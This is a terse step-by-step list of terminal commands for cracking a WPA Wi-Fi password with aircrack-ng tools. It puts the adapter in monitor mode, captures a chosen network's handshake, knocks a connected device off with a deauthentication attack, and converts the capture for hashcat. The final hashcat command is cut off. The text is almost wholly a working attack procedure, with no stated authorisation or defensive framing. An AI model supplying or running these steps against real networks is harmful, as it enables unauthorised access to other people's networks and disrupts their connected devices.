- Open a Terminal and type the following commands:
> "airmon-ng" > "airmon-ng start wlan0" > "ifconfig wlan0mon down" > "iwconfig wlan0mon mode monitor" > "ifconfig wlan0mon up" > "airodump-ng wlan0mon"
- Now pick a wireless interface | copy the SSID:
> "airodump-ng --bssid 00:22:33:FF:AB:CD -c 11 --write CrackWPA wlan0mon"
- Send a deauth to one of the devices connected:
> "aireplay-ng --deauth 10 -a 01:02:ab:03:04:ff -c 10:03:cd:04:06:fe wlan0mon" > "cp CrackWPA-01.cap /root/Desktop/" > "cd Desktop/" > "wpaclean CrackFile.cap CrackWPA-01.cap" > "aircrack-ng CrackFile.cap -J wpacrack"
- Press Ctrl + Z (to exit):
> "hashcat -m 2500 /root/Desktop/wpacrack.hccap ...